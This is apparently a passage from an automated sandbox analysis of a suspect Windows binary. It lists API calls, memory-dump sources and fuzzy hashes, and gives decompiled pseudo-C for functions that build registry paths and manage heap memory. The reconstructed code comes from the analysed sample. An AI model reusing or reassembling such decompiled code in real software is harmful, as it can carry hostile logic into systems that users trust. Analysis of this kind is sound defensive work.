                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F7873
                                                                                                                                  • int.LIBCPMT ref: 6E8F788A
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F78C4
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F78E4
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F78F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F7993
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F799D
                                                                                                                                  • int.LIBCPMT ref: 6E8F79B4
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 6E8F79EE
                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F7A0E
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 6E8F7A1B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 55977855-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E00A3282B(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int* _v16;
                                                                                                                                  				char _v284;
                                                                                                                                  				void* __esi;
                                                                                                                                  				char* _t59;
                                                                                                                                  				intOrPtr* _t60;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				char _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				intOrPtr _t69;
                                                                                                                                  				intOrPtr _t71;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t92;
                                                                                                                                  				char _t98;
                                                                                                                                  				signed int* _t100;
                                                                                                                                  				intOrPtr* _t101;
                                                                                                                                  				void* _t102;
                                                                                                                                  
                                                                                                                                  				_t92 = __ecx;
                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                  				_t98 = _a16;
                                                                                                                                  				if(_t98 == 0) {
                                                                                                                                  					__imp__( &_v284,  *0xa3d37c);
                                                                                                                                  					_t91 = 0x80000002;
                                                                                                                                  					L6:
                                                                                                                                  					_t59 = E00A31922( &_v284,  &_v284);
                                                                                                                                  					_a8 = _t59;
                                                                                                                                  					if(_t59 == 0) {
                                                                                                                                  						_v8 = 8;
                                                                                                                                  						L29:
                                                                                                                                  						_t60 = _a20;
                                                                                                                                  						if(_t60 != 0) {
                                                                                                                                  							 *_t60 =  *_t60 + 1;
                                                                                                                                  						}
                                                                                                                                  						return _v8;
                                                                                                                                  					}
                                                                                                                                  					_t101 = _a24;
                                                                                                                                  					if(E00A35C6E(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                                                                                                  						L27:
                                                                                                                                  						E00A34AAB(_a8);
                                                                                                                                  						goto L29;
                                                                                                                                  					}
                                                                                                                                  					_t64 =  *0xa3d2b0; // 0x33a9b38
                                                                                                                                  					_t16 = _t64 + 0xc; // 0x33a9c06
                                                                                                                                  					_t65 = E00A31922(_t64,  *_t16);
                                                                                                                                  					_a24 = _t65;
                                                                                                                                  					if(_t65 == 0) {
                                                                                                                                  						L14:
                                                                                                                                  						_t29 = _t101 + 0x14; // 0x102
                                                                                                                                  						_t33 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  						if(E00A34A6D(_t97,  *_t33, _t91, _a8,  *0xa3d374,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                                                                                                  							_t68 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  							if(_t98 == 0) {
                                                                                                                                  								_t35 = _t68 + 0xa3ea48; // 0x4d4c4b48
                                                                                                                                  								_t69 = _t35;
                                                                                                                                  							} else {
                                                                                                                                  								_t34 = _t68 + 0xa3ea43; // 0x55434b48
                                                                                                                                  								_t69 = _t34;
                                                                                                                                  							}
                                                                                                                                  							if(E00A35F64(_t69,  *0xa3d374,  *0xa3d378,  &_a24,  &_a16) == 0) {
                                                                                                                                  								if(_t98 == 0) {
                                                                                                                                  									_t71 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  									_t44 = _t71 + 0xa3e83e; // 0x74666f53
                                                                                                                                  									_t73 = E00A31922(_t44, _t44);
                                                                                                                                  									_t99 = _t73;
                                                                                                                                  									if(_t73 == 0) {
                                                                                                                                  										_v8 = 8;
                                                                                                                                  									} else {
                                                                                                                                  										_t47 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  										E00A35DDA( *_t47, _t91, _a8,  *0xa3d378, _a24);
                                                                                                                                  										_t49 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  										E00A35DDA( *_t49, _t91, _t99,  *0xa3d370, _a16);
                                                                                                                                  										E00A34AAB(_t99);
                                                                                                                                  									}
                                                                                                                                  								} else {
                                                                                                                                  									_t40 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  									E00A35DDA( *_t40, _t91, _a8,  *0xa3d378, _a24);
                                                                                                                                  									_t43 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  									E00A35DDA( *_t43, _t91, _a8,  *0xa3d370, _a16);
                                                                                                                                  								}
                                                                                                                                  								if( *_t101 != 0) {
                                                                                                                                  									E00A34AAB(_a24);
                                                                                                                                  								} else {
                                                                                                                                  									 *_t101 = _a16;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L27;
                                                                                                                                  					}
                                                                                                                                  					_t21 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  					_t81 = E00A363F5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                                                                                                  					if(_t81 == 0) {
                                                                                                                                  						_t100 = _v16;
                                                                                                                                  						if(_v12 == 0x28) {
                                                                                                                                  							 *_t100 =  *_t100 & _t81;
                                                                                                                                  							_t26 = _t101 + 0x10; // 0x3d00a3c0
                                                                                                                                  							E00A34A6D(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                                                                                                  						}
                                                                                                                                  						E00A34AAB(_t100);
                                                                                                                                  						_t98 = _a16;
                                                                                                                                  					}
                                                                                                                                  					E00A34AAB(_a24);
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                                                                                                  					goto L29;
                                                                                                                                  				} else {
                                                                                                                                  					_t97 = _a8;
                                                                                                                                  					E00A3A938(_t98, _a8,  &_v284);
                                                                                                                                  					__imp__(_t102 + _t98 - 0x117,  *0xa3d37c);
                                                                                                                                  					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                                                                                                  					_t91 = 0x80000003;
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  			}
























                                                                                                                                  APIs
                                                                                                                                  • StrChrA.SHLWAPI(00A32197,0000005F,00000000,00000000,00000104), ref: 00A3285E
                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 00A3288B
                                                                                                                                    • Part of subcall function 00A31922: lstrlen.KERNEL32(?,00000000,033A9B38,00000000,00A374FF,033A9D16,?,?,?,?,?,69B25F44,00000005,00A3D00C), ref: 00A31929
                                                                                                                                    • Part of subcall function 00A31922: mbstowcs.NTDLL ref: 00A31952
                                                                                                                                    • Part of subcall function 00A31922: memset.NTDLL ref: 00A31964
                                                                                                                                    • Part of subcall function 00A35DDA: lstrlenW.KERNEL32(?,?,?,00A329F4,3D00A3C0,80000002,00A32197,00A3258B,74666F53,4D4C4B48,00A3258B,?,3D00A3C0,80000002,00A32197,?), ref: 00A35DFF
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  • lstrcpy.KERNEL32(?,00000000), ref: 00A328AD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                  • String ID: ($\
                                                                                                                                  • API String ID: 3924217599-1512714803
                                                                                                                                  • Opcode ID: b824d1fccf8ce7b9d8af9a4038a0dbe90d81b770fa89b698d75d7c3e0ce6fcb8
                                                                                                                                  • Instruction ID: cdae158385314d487244e79a24c72c2f738558b3fefa1327c699a07507a2ff4d
                                                                                                                                  • Opcode Fuzzy Hash: b824d1fccf8ce7b9d8af9a4038a0dbe90d81b770fa89b698d75d7c3e0ce6fcb8
                                                                                                                                  • Instruction Fuzzy Hash: 0351477290060AEFDF22DFA4ED41FAA3BB9FF18390F108514FA1196161D735EE269B10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2204710431-1686923651
                                                                                                                                  • Opcode ID: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction ID: 5432ddae9369842a7e26f9663d4ef6ea3061af4ab918a544d97c6a3d04249322
                                                                                                                                  • Opcode Fuzzy Hash: 9d4bcbeb06d206b8713bd4c3b54ca893d0ddde55cad070fc19330a0dd95971b4
                                                                                                                                  • Instruction Fuzzy Hash: 72217FB1904A96AFDB21CFB8849076BBEECAF18254F044E1EE459C7A41E734D602CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E00A34B98() {
                                                                                                                                  				void* _v0;
                                                                                                                                  				void** _t3;
                                                                                                                                  				void** _t5;
                                                                                                                                  				void** _t7;
                                                                                                                                  				void** _t8;
                                                                                                                                  				void* _t10;
                                                                                                                                  
                                                                                                                                  				_t3 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				__imp__( &(_t3[0x10]));
                                                                                                                                  				while(1) {
                                                                                                                                  					_t5 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t7 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				_t10 =  *_t7;
                                                                                                                                  				if(_t10 != 0 && _t10 != 0xa3e823) {
                                                                                                                                  					HeapFree( *0xa3d270, 0, _t10);
                                                                                                                                  					_t7 =  *0xa3d364; // 0x33a95b0
                                                                                                                                  				}
                                                                                                                                  				 *_t7 = _v0;
                                                                                                                                  				_t8 =  &(_t7[0x10]);
                                                                                                                                  				__imp__(_t8);
                                                                                                                                  				return _t8;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A34BA1
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00A35390), ref: 00A34BAB
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,00A35390), ref: 00A34BD9
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A34BEE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 53ded4aa1fed252d69b984c084318532386a27d9f443d7aef74421f8eddb8432
                                                                                                                                  • Instruction ID: 5b263adde730f369479904bcd63690b5ddcdadd29220cee1fc06235e9a87dc69
                                                                                                                                  • Opcode Fuzzy Hash: 53ded4aa1fed252d69b984c084318532386a27d9f443d7aef74421f8eddb8432
                                                                                                                                  • Instruction Fuzzy Hash: AFF0B2B8A04340DBEB18CFE4FE99F1577A4AB4A310B044019B502DB260C720EC429A11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                  • Opcode ID: bcbe779c31157eed50c4d06ee93e4cef3150bdbee6bcf5f37e242bf07f2cb4fb
                                                                                                                                  • Instruction ID: 82f023b999c3dbb32c2ab1f495dcb7a8f1f98f948c5c582d9c68e0e3c7da7879
                                                                                                                                  • Opcode Fuzzy Hash: bcbe779c31157eed50c4d06ee93e4cef3150bdbee6bcf5f37e242bf07f2cb4fb
                                                                                                                                  • Instruction Fuzzy Hash: C951E532A00715AFEB10DFAAC880AAA77F8FF59714F244969E815DB250E731D901CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2404127365-0
                                                                                                                                  • Opcode ID: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction ID: 9d9f6c3f39ee678dd2dadd4c07138d11817211271ce1b65009b54289335904b0
                                                                                                                                  • Opcode Fuzzy Hash: 553052bb9a527c4a483356c8188f8bd8eb366442fb42275b7b9b83cdb0162acf
                                                                                                                                  • Instruction Fuzzy Hash: BE2125B1C00348EFDB14DFE5D8849DABBB8AF84714F00895AE9159F255EB70DA41CFA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$Maklocchr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2020259771-0
                                                                                                                                  • Opcode ID: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction ID: 877c5e5175563c59976a1fc4e5f63ef5d0250026fd5787aa7b6c7256552b63e9
                                                                                                                                  • Opcode Fuzzy Hash: 2833313188859c668e58f4cf59359ed7e4d85d9231e0e25294733c2f7c2fcab2
                                                                                                                                  • Instruction Fuzzy Hash: CB116DB1960745FFE6208BE99840B52B7ECAF04694F048E2AF2448B640D365F95197E4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • _free.LIBCMT ref: 6E93CEFD
                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction ID: 6317e2dcd4c17c898ec34a8ae09e7dc21c832c8673b0bc5dcaf0d10dc1b83b76
                                                                                                                                  • Opcode Fuzzy Hash: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction Fuzzy Hash: CDF06D35509E34ABCA40DBDAE488DDB37EDAF42614BB84C05F018DB601CB30F8C48EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  • Opcode ID: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction ID: 11973df3d927521aebf228c1b77d65fb753f2ca8bfa0d7065b47be3915b1b248
                                                                                                                                  • Opcode Fuzzy Hash: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction Fuzzy Hash: FF8139B1904628DFCF08CF98CA90EEA77B5FF57304F108959D206A7684D7B4AA4CDB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                  			E00A3577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __edi;
                                                                                                                                  				intOrPtr _t18;
                                                                                                                                  				void* _t24;
                                                                                                                                  				void* _t30;
                                                                                                                                  				void* _t36;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr _t42;
                                                                                                                                  
                                                                                                                                  				_t36 = __edx;
                                                                                                                                  				_t32 = __ecx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t42 =  *0xa3d380; // 0x33a9b28
                                                                                                                                  				_push(0x800);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push( *0xa3d270);
                                                                                                                                  				if( *0xa3d284 >= 5) {
                                                                                                                                  					if(RtlAllocateHeap() == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						_t30 = 8;
                                                                                                                                  						L7:
                                                                                                                                  						if(_t30 != 0) {
                                                                                                                                  							L10:
                                                                                                                                  							 *0xa3d284 =  *0xa3d284 + 1;
                                                                                                                                  							L11:
                                                                                                                                  							return _t30;
                                                                                                                                  						}
                                                                                                                                  						_t44 = _a4;
                                                                                                                                  						_t40 = _v8;
                                                                                                                                  						 *_a16 = _a4;
                                                                                                                                  						 *_a20 = E00A3789B(_t44, _t40);
                                                                                                                                  						_t18 = E00A33720(_t40, _t44);
                                                                                                                                  						if(_t18 != 0) {
                                                                                                                                  							 *_a8 = _t40;
                                                                                                                                  							 *_a12 = _t18;
                                                                                                                                  							if( *0xa3d284 < 5) {
                                                                                                                                  								 *0xa3d284 =  *0xa3d284 & 0x00000000;
                                                                                                                                  							}
                                                                                                                                  							goto L11;
                                                                                                                                  						}
                                                                                                                                  						_t30 = 0xbf;
                                                                                                                                  						E00A347D5();
                                                                                                                                  						HeapFree( *0xa3d270, 0, _t40);
                                                                                                                                  						goto L10;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E00A344A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                                                                                                  					L5:
                                                                                                                                  					_t30 = _t24;
                                                                                                                                  					goto L7;
                                                                                                                                  				}
                                                                                                                                  				if(RtlAllocateHeap() == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				_t24 = E00A36109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                                                                                                                  				goto L5;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00A357A1
                                                                                                                                    • Part of subcall function 00A36109: GetTickCount.KERNEL32 ref: 00A3611D
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A3616D
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A3618A
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A361B6
                                                                                                                                    • Part of subcall function 00A36109: HeapFree.KERNEL32(00000000,?), ref: 00A361C8
                                                                                                                                    • Part of subcall function 00A36109: wsprintfA.USER32 ref: 00A361E9
                                                                                                                                    • Part of subcall function 00A36109: HeapFree.KERNEL32(00000000,?), ref: 00A361F9
                                                                                                                                    • Part of subcall function 00A36109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A36227
                                                                                                                                    • Part of subcall function 00A36109: GetTickCount.KERNEL32 ref: 00A36238
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00A357BF
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000002,00A3553A,?,00A3553A,00000002,?,?,00A353C9,?), ref: 00A3581C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 1676223858-8415677
                                                                                                                                  • Opcode ID: 427e8e8ecdb4b284fe62bb7573c1b1988bbdbe77d80ed236d0751960be654303
                                                                                                                                  • Instruction ID: 5bf2202d1c7a90bbe2cd38db8cdab5ef203744543f6e71a1acdd7a500b76ca66
                                                                                                                                  • Opcode Fuzzy Hash: 427e8e8ecdb4b284fe62bb7573c1b1988bbdbe77d80ed236d0751960be654303
                                                                                                                                  • Instruction Fuzzy Hash: A2214CB6600605EBCB11DFA8ED84EDA37BCEB49350F100426F902A7251DB70E906DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  • Opcode ID: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction ID: 6dcc549fe59e99c9fe3fc5f3eba8f0bf9d81947785cd0296121c9bca1ad7a167
                                                                                                                                  • Opcode Fuzzy Hash: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction Fuzzy Hash: E02171B1904B56AFD721CFB98450B7BBAECAF18258B040E1EA459C7A41D774D602CFD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  • Opcode ID: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction ID: 3e96006575a0a05f8f3ff08aa6ed7046c1720db0e26f2fecf60b3499a05e8932
                                                                                                                                  • Opcode Fuzzy Hash: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction Fuzzy Hash: 992183B1904B56AFD761CFB9845077BBEECAF18244F440A1EE499C7A41E734D642CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00A332AE
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A33393
                                                                                                                                    • Part of subcall function 00A35920: SysAllocString.OLEAUT32(00A3C2B0), ref: 00A35970
                                                                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 00A333E6
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A333F5
                                                                                                                                    • Part of subcall function 00A33D39: Sleep.KERNEL32(000001F4), ref: 00A33D81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3193056040-0
                                                                                                                                  • Opcode ID: b534873056b775fe0632f3cfe1563c3697e4e272899e8847188d1025ab5b37a5
                                                                                                                                  • Instruction ID: 24a29bdb98cad0e9524460c7d6730b0e230f317a996be51297770b69219b4af4
                                                                                                                                  • Opcode Fuzzy Hash: b534873056b775fe0632f3cfe1563c3697e4e272899e8847188d1025ab5b37a5
